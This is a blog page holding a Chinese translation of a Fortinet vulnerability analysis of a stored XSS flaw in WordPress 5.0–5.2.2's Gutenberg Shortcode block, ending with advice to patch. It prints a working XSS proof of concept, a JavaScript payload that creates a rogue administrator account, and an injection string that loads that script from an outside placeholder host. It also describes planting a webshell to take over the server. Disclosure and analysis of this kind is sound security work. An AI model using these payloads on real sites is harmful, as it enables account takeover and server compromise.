<!DOCTYPE HTML>
<html lang="zh-CN">

<head><meta name="generator" content="Hexo 3.8.0">
    <!--Setting-->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta name="renderer" content="webkit|ie-comp|ie-stand">
    <meta name="apple-mobile-web-app-capable" content="ALL BLUE">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no,email=no,adress=no">
    <meta name="browsermode" content="application">
    <meta name="screen-orientation" content="portrait">
    <meta name="theme-version" content="1.2.3">
    <meta name="root" content="/">
    <link rel="dns-prefetch" href="http://allblue147.github.io">
    <!--SEO-->

<meta name="keywords" content>


<meta name="description" content="译文声明本文是翻译文章，文章原作者fortinet，文章来源：fortinet.com原文地址：https://www.fortinet.com/blog/threat-research/wor...">


<meta name="robots" content="all">
<meta name="google" content="all">
<meta name="googlebot" content="all">
<meta name="verify" content="all">
    <!--Title-->

<title>
    
    WordPress存储型XSS漏洞分析 |
    
    ALL BLUE
</title>

<link rel="alternate" href="/atom.xml" title="ALL BLUE" type="application/atom+xml">


<link rel="icon" href="/favicon.ico">

    

<link rel="stylesheet" href="/css/bootstrap.min.css?rev=3.3.7">
<link rel="stylesheet" href="/css/font-awesome.min.css?rev=4.7.0">
<link rel="stylesheet" href="/css/style.css?rev=@@hash">
    
<div class="hide">
    <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");
    document.write(unescape("%3Cspan class='cnzz_stat_icon_1263868967 hide' %3E%3Cscript%20src%3D%22https%3A%2F%2Fs95.cnzz.com%2Fz_stat.php%3Fweb_id%3D1272564536%22%3E%3C%2Fscript%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s19.cnzz.com/z_stat.php%3Fid%3D1263868967%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script>
</div>




    

</head></html>
<!--[if lte IE 8]>
<style>
    html{ font-size: 1em }
</style>
<![endif]-->
<!--[if lte IE 9]>
<div style="ie">你使用的浏览器版本过低，为了你更好的阅读体验，请更新浏览器的版本或者使用其他现代浏览器，比如Chrome、Firefox、Safari等。</div>
<![endif]-->
<body>
    <header class="main-header" style="background-image:url(
    https://hexo-theme-snippet-1251680922.cos.ap-beijing.myqcloud.com/img/banner.jpg)">
    <div class="main-header-box">
        <a class="header-avatar" href="/" title="JYP">
            <img src="/img/avatar.jpg" alt="logo头像" class="img-responsive center-block">
        </a>
        <div class="branding">
            <!--<h2 class="text-hide">Snippet主题,从未如此简单有趣</h2>-->
            
            <img src="/img/branding.png" alt="Snippet 博客主题" class="img-responsive center-block">
            
        </div>
    </div>
</header>
    <nav class="main-navigation">
    <div class="container">
        <div class="row">
            <div class="col-sm-12">
                <div class="navbar-header"><span class="nav-toggle-button collapsed pull-right" data-toggle="collapse" data-target="#main-menu" id="mnav">
                        <span class="sr-only"></span>
                        <i class="fa fa-bars"></i>
                    </span>
                    <a class="navbar-brand" href="http://allblue147.github.io">
                        ALL BLUE</a>
                </div>
                <div class="collapse navbar-collapse" id="main-menu">
                    <ul class="menu">
                        
                        <li role="presentation" class="text-center">
                            <a href="/"><i class="fa "></i>
                                首页</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/前端/"><i class="fa "></i>
                                前端</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/后端/"><i class="fa "></i>
                                后端</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/categories/工具/"><i class="fa "></i>
                                工具</a>
                        </li>
                        
                        <li role="presentation" class="text-center">
                            <a href="/archives/"><i class="fa "></i>
                                时间轴</a>
                        </li>
                        
                    </ul>
                </div>
            </div>
        </div>
    </div>
</nav>
    <section class="content-wrap">
        <div class="container">
            <div class="row">
                <main class="col-md-8 main-content m-post">
                    <p id="process"></p>
<article class="post">
    <div class="post-head">
        <h1 id="WordPress存储型XSS漏洞分析">
            
            WordPress存储型XSS漏洞分析
            
        </h1>
        <div class="post-meta">
    
    <span class="categories-meta fa-wrap">
        <i class="fa fa-folder-open-o"></i>
        <a class="category-link" href="/categories/漏洞/">漏洞</a>
    </span>
    
    
    <span class="fa-wrap">
        <i class="fa fa-tags"></i>
        <span class="tags-meta">
            
        </span>
    </span>
    
    
    
    <span class="fa-wrap">
        <i class="fa fa-clock-o"></i>
        <span class="date-meta">
            2019/12/07</span>
    </span>
    
    
</div>
        
        
        <p class="fa fa-exclamation-triangle warning">
            本文于<strong>
                587</strong>
            天之前发表，文中内容可能已经过时。
        </p>
        
    </div>
    
    <div class="post-body post-content">
        <p><strong>译文声明<br>本文是翻译文章，文章原作者fortinet，文章来源：fortinet.com<br>原文地址：<a href="https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html" target="_blank" rel="noopener">https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html</a><br>译文仅供参考，具体内容表达以及含义原文为准</strong></p>
<p><img src="https://p3.ssl.qhimg.com/t0154214347380ba2a2.png" alt> </p>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>WordPress是世界上最流行的CMS（内容管理系统），占据全球60.4%的市场份额，这个数字远远高于第二名的Joomla!（5.2%的市场份额）。因此，在互联网上有超过三分之一的网站采用WordPress构建。</p>
<p>FortiGuard Labs团队最近在WordPress中发现了一个存储型XSS（Cross-Site Scripting）0day漏洞，这个XSS漏洞位于WordPress 5.0新增的Gutenberg编辑器中，该编辑器无法正确过滤Shortcode（短代码）错误消息中的JavaScript/HTML代码。如果远程攻击者具备Contributor（贡献者）或者更高权限，当受害者访问被攻击的网页时，攻击者就可以在受害者浏览器上下文中执行任意JavaScript/HTML代码。如果受害者具备更高权限（比如管理员权限），攻击者甚至可以攻破整个web服务器。</p>
<p>这个存储型XSS漏洞影响5.0至5.2.2版的WordPress。</p>
<h2 id="0x01-漏洞分析"><a href="#0x01-漏洞分析" class="headerlink" title="0x01 漏洞分析"></a>0x01 漏洞分析</h2><p>在WordPress 5.0中，用户可以在文章（post）中添加Shortcode块（block）。当在Shortcode块中添加特定的HTML编码字符（比如&lt;）然后重新打开该文章时，WordPress就会显示一个错误消息，将&lt;解码成&lt;然后展示预览。</p>
<p><img src="https://p5.ssl.qhimg.com/t018c8ac1b86a6e22ac.png" alt><br>图1. 在Shortcode块中插入HTML编码字符</p>
<p><img src="https://p1.ssl.qhimg.com/t0113d0da196199b259.png" alt><br>图2. Shortcode错误消息预览</p>
<p>我们可以使用<strong>“&gt;&lt;img src=1 onerror=prompt(1)&gt;</strong>这段PoC代码轻松绕过预览视图中的XSS过滤器。</p>
<p><img src="https://p1.ssl.qhimg.com/t0113d0da196199b259.png" alt><br>图3. 将PoC代码插入Shortcode块</p>
<p>当受害者查看该文章时，就会在浏览器中执行XSS代码。</p>
<p><img src="https://p3.ssl.qhimg.com/t010226398ebf02fdd8.png" alt><br>图4. WordPress Shortcode预览XSS</p>
<p>如果受害者刚好具备管理员权限，那么攻击者就可以利用该漏洞来获取管理员账户的控制权，利用WordPress内置的函数拿到shell，进一步控制整个服务器。</p>
<p>比如，攻击者可以在自己的web服务器上托管一个JavaScript文件（这里以wpaddadmin.js为例），这段JavaScript代码会添加一个WordPress管理员账户，用户名为attack，密码为attack。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">// Send a GET request to the URL &apos;/wordpress/wp-admin/user-new.php&apos;, and extract the current &apos;nonce&apos; value  </span><br><span class="line">var ajaxRequest = new XMLHttpRequest();  </span><br><span class="line">var requestURL = &quot;/wordpress/wp-admin/user-new.php&quot;;  </span><br><span class="line">var nonceRegex = /ser&quot; value=&quot;([^&quot;]*?)&quot;/g;  </span><br><span class="line">ajaxRequest.open(&quot;GET&quot;, requestURL, false);  </span><br><span class="line">ajaxRequest.send();  </span><br><span class="line">var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);  </span><br><span class="line">var nonce = nonceMatch[1];  </span><br><span class="line"></span><br><span class="line">// Construct a POST query, using the previously extracted &apos;nonce&apos; value, and create a new user with an arbitrary username / password, as an Administrator  </span><br><span class="line">var params = &quot;action=createuser&amp;_wpnonce_create-user=&quot;+nonce+&quot;&amp;user_login=attacker&amp;email=attacker@site.com&amp;pass1=attacker&amp;pass2=attacker&amp;role=administrator&quot;;  </span><br><span class="line">ajaxRequest = new XMLHttpRequest();  </span><br><span class="line">ajaxRequest.open(&quot;POST&quot;, requestURL, true);  </span><br><span class="line">ajaxRequest.setRequestHeader(&quot;Content-Type&quot;, &quot;application/x-www-form-urlencoded&quot;);  </span><br><span class="line">ajaxRequest.send(params);</span><br></pre></td></tr></table></figure>
<p>然后攻击者可以使用如下PoC来插入JavaScript。</p>
<p><code>&quot;&amp;gt;&amp;lt;img src=1 onerror=&quot;javascript&amp;colon;(function () { var url = &#39;http://aaa.bbb.ccc.ddd/ wpaddadmin.js&#39;;if (typeof beef == &#39;undefined&#39;) { var bf = document.createElement(&#39;script&#39;); bf.type = &#39;text/javascript&#39;; bf.src = url; document.body.appendChild(bf);}})();&quot;&amp;gt;</code><br><img src="https://p3.ssl.qhimg.com/t01ff29771459e602b0.png" alt><br>图5. 插入XSS代码以添加管理员账户</p>
<p>一旦具备高权限的受害者查看该文章，就会创建attacker管理员账户。<br><img src="https://p4.ssl.qhimg.com/t010e42abaa7fcc8d89.png" alt><br>图6. 执行XSS代码</p>
<p><img src="https://p4.ssl.qhimg.com/t013e0fbc54e4f4a6c4.png" alt><br>图7. XSS代码成功创建具备管理员权限的attacker账户</p>
<p>随后攻击者可以修改已有的php文件，改成webshell代码，以便接管目标web服务器。</p>
<p><img src="https://p0.ssl.qhimg.com/t0131da4b3ea2ca7c86.png" alt></p>
<p>图8. 使用攻击者账户添加webshell</p>
<p><img src="https://p1.ssl.qhimg.com/t01c0b5cda440e3cf4b.png" alt><br>图9. 控制web服务器</p>
<h2 id="0x02-解决方案"><a href="#0x02-解决方案" class="headerlink" title="0x02 解决方案"></a>0x02 解决方案</h2><p>FortiGuard Labs向WordPress反馈了这个0day漏洞，官方很快发布了相应补丁。如果大家正在使用存在漏洞的WordPress版本，请尽快升级到最新版，或者及时打上补丁。</p>

    </div>
    
    <div class="post-footer">
        <div>
            
            转载声明：
            商业转载请联系作者获得授权,非商业转载请注明出处 © <a href target="_blank">Snippet</a>
            
            
        </div>
        <div>
            
        </div>
    </div>
</article>
<div class="article-nav prev-next-wrap clearfix">
    
    <a href="/2019/12/07/漏洞搜集/犀牛(RhinOS)CMS3.X任意文件下载漏洞(CVE-2018-18760)/" class="pre-post btn btn-default" title="犀牛(RhinOS)CMS3.X任意文件下载漏洞(CVE-2018-18760)">
        <i class="fa fa-angle-left fa-fw"></i><span class="hidden-lg">上一篇</span>
        <span class="hidden-xs">
            犀牛(RhinOS)CMS3.X任意文件下载漏洞(CVE-2018-18760)</span>
    </a>
    
    
    <a href="/2019/12/07/漏洞搜集/cve-20190-0708/" class="next-post btn btn-default" title="简单判断是否是cve-2019-0708攻击">
        <span class="hidden-lg">下一篇</span>
        <span class="hidden-xs">
            简单判断是否是cve-2019-0708攻击</span><i class="fa fa-angle-right fa-fw"></i>
    </a>
    
</div>

<div id="comments">
    

<div id="vcomments" class="valine"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="/assets/valine.min.js"></script>
<script>
new Valine({
    av: AV,
    el: '#vcomments',
    appId: 'xOKV9J4UeQAtVkvnJC7Kq2Jn-gzGzoHsz',
    appKey: 'erIpQac4azoCmgfBB7Dl9maa',
    placeholder: '说点什么吧',
    notify: false,
    verify: true,
    avatar: 'mm',
    meta: 'nick,mail'.split(','),
    pageSize: '10',
    path: window.location.pathname,
    lang: 'zh-CN'.toLowerCase()
})
</script>


</div>

                </main>
                
                    <aside id="article-toc" role="navigation" class="col-md-4">
    <div class="widget">
        <h3 class="title">
            文章目录
        </h3>
        
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-前言"><span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-漏洞分析"><span class="toc-text">0x01 漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-解决方案"><span class="toc-text">0x02 解决方案</span></a></li></ol>
        
    </div>
</aside>
                
            </div>
        </div>
    </section>
    <footer class="main-footer">
    <div class="container">
        <div class="row">
        </div>
    </div>
</footer>
<a id="back-to-top" class="icon-btn hide">
    <i class="fa fa-chevron-up"></i>
</a>
    <div class="copyright">
    <div class="container">
        <div class="row">
            <div class="col-sm-12">
                <div class="busuanzi">
    
</div>
            </div>
            <div class="col-sm-12">
                <span>Copyright &copy;
                    2017
                    
                </span> |
                <span>
                    Powered by <a href="//hexo.io" class="copyright-links" target="_blank" rel="nofollow">Hexo</a>
                </span> |
                <span>
                    Theme by <a href="//github.com/shenliyang/hexo-theme-snippet.git" class="copyright-links" target="_blank" rel="nofollow">Snippet</a>
                </span>
            </div>
        </div>
    </div>
</div>



<script src="/js/app.js?rev=@@hash"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>